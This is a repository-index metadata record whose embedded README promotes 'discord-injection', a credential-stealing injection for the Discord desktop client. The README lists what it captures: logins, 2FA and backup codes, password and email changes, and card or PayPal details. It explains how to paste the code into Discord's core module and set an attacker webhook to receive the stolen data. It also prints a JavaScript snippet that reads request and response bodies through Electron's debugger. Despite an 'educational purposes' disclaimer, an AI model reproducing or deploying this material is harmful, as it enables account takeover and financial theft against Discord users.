{"id":44627831,"url":"https://github.com/hackirby/discord-injection","last_synced_at":"2026-02-14T15:38:34.388Z","repository":{"id":203146068,"uuid":"708848236","full_name":"hackirby/discord-injection","owner":"hackirby","description":"Discord HTTP requests interception POC, including backup codes requests, for educational purposes only.","archived":false,"fork":false,"pushed_at":"2024-07-11T12:36:31.000Z","size":118,"stargazers_count":15,"open_issues_count":1,"forks_count":2,"subscribers_count":1,"default_branch":"main","last_synced_at":"2024-07-12T13:29:03.115Z","etag":null,"topics":["2fa","backup-codes","credit-card","discord","discord-injection","email","login","mfa","password","paypal","qrcode","register","token","token-grabber"],"latest_commit_sha":null,"homepage":"","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/hackirby.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2023-10-23T14:06:32.000Z","updated_at":"2024-07-12T04:04:51.000Z","dependencies_parsed_at":null,"dependency_job_id":"d725e461-31a9-4840-9cdd-cc4f90c9957c","html_url":"https://github.com/hackirby/discord-injection","commit_stats":null,"previous_names":["hackirby/discord-injection"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/hackirby/discord-injection","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/hackirby%2Fdiscord-injection","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/hackirby%2Fdiscord-injection/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/hackirby%2Fdiscord-injection/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/hackirby%2Fdiscord-injection/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/hackirby","download_url":"https://codeload.github.com/hackirby/discord-injection/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/hackirby%2Fdiscord-injection/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":29448126,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-02-14T14:10:32.461Z","status":"ssl_error","status_checked_at":"2026-02-14T14:09:49.945Z","response_time":53,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["2fa","backup-codes","credit-card","discord","discord-injection","email","login","mfa","password","paypal","qrcode","register","token","token-grabber"],"created_at":"2026-02-14T15:38:29.809Z","updated_at":"2026-02-14T15:38:34.379Z","avatar_url":"https://github.com/hackirby.png","language":"JavaScript","readme":"\u003ch1 align=\"center\"\u003e\n  Discord Injection 💉\n\u003c/h1\u003e\n\n\u003cp align=\"center\"\u003e\n   Discord HTTP requests interception POC, including backup codes request and many others !\n\u003c/p\u003e\n\n## Features\n- Intercept login, register and 2FA login requests\n- Intercept backup codes requests\n- Intercept email/password changes requests\n- Intercept credit card/paypal adding\n- Logout user after initial injection\n- Block usage of QR Code to login\n- Block request to see devices\n\n## Installation\n- Completely close Discord\n- Copy the [injection code](https://raw.githubusercontent.com/hackirby/discord-injection/main/injection.js) inside your Discord desktop core:\n\n`%APPDATA%\\Local\\Discord\\app-\u003capp-version\u003e\\modules\\discord_desktop_core-\u003ccore-version\u003e\\discord_desktop_core\\index.js`\n\n- Replace `%WEBHOOK%` by your Discord webhook. The informations intercepted will be sent this way.\n- Restart Discord\n\n## Preview\n### Backup codes sniffing\n![image](./assets/codes.png)\n### Devices blocking\n![image](./assets/devices.png)\n\n## How does backup codes sniffing work ?\nI use the [debugger](https://www.electronjs.org/docs/latest/api/debugger) instead of the [WebRequests instance methods](https://www.electronjs.org/docs/latest/api/web-request#instance-methods). It allow me to get request body AND response body:\n\n```js\nmainWindow.webContents.debugger.on('message', async (_, method, params) =\u003e {\n    if (method !== 'Network.responseReceived') return;\n    if (![200, 202].includes(params.response.status)) return;\n\n    const responseUnparsedData = await mainWindow.webContents.debugger.sendCommand('Network.getResponseBody', {\n        requestId: params.requestId\n    });\n    const responseData = JSON.parse(responseUnparsedData.body);\n\n    const requestUnparsedData = await mainWindow.webContents.debugger.sendCommand('Network.getRequestPostData', {\n        requestId: params.requestId\n    });\n    const requestData = JSON.parse(requestUnparsedData.postData);\n})\n```\nThe backup codes are in the response body of `/mfa/codes-verification` request\n\n## Contributing\nIf you wish to contribute to this project, kindly open an issue or submit a pull request with your proposed changes. We warmly welcome contributions from the community.\n\n## Enjoying the Project?\n- Leave a Star 🌟: Click on the star button at the top of the GitHub repository to show your appreciation.\n- Follow me on GitHub: Stay updated with the latest developments by following my GitHub profile.\n- Donate ☕: If you're feeling generous and would like to contribute financially, you can donate to help sustain and improve this project. Every little bit helps!\n\n\u003ca href='https://ko-fi.com/hackirby'\u003e\u003cimg src='https://storage.ko-fi.com/cdn/kofi3.png' width=150\u003e\u003c/a\u003e\n\n## License\nThis project is licensed under the MIT License. For more information, please consult the LICENSE file.\n\n## Acknowledgements\n\nSpecial thanks to Rdimo for the injection persistence functions.\n\n## Disclaimer:\n\n### Important Notice:\nThis injection is inteded for educational purposes only. This is provided strictly for educational and research purposes. Under no circumstances this should be used for any malicious activities, including but not limited to unauthorized access, data theft, or any other harmful actions.\n\n### Usage Responsibility:\n\nBy accessing and using this injection, you acknowledge that you are solely responsible for your actions. Any misuse of this injection is strictly prohibited, and the creator (hackirby) disclaims any responsibility for how this injection is utilized. You are fully accountable for ensuring that your usage complies with all applicable laws and regulations in your jurisdiction.\n\n### No Liability:\n\nThe creator (hackirby) of this injection shall not be held responsible for any damages or legal consequences resulting from the use or misuse of this software. This includes, but is not limited to, direct, indirect, incidental, consequential, or punitive damages arising out of your access, use, or inability to use this injection.\n\n### No Support:\n\nThe creator (hackirby) will not provide any support, guidance, or assistance related to the misuse of this injection. Any inquiries regarding malicious activities will be ignored.\n\n### Acceptance of Terms:\n\nBy using this injection, you signify your acceptance of this disclaimer. If you do not agree with the terms stated in this disclaimer, do not use this injection.\n\n","funding_links":["https://ko-fi.com/hackirby'","https://storage.ko-fi.com/cdn/kofi3.png'"],"categories":[],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fhackirby%2Fdiscord-injection","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fhackirby%2Fdiscord-injection","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fhackirby%2Fdiscord-injection/lists"}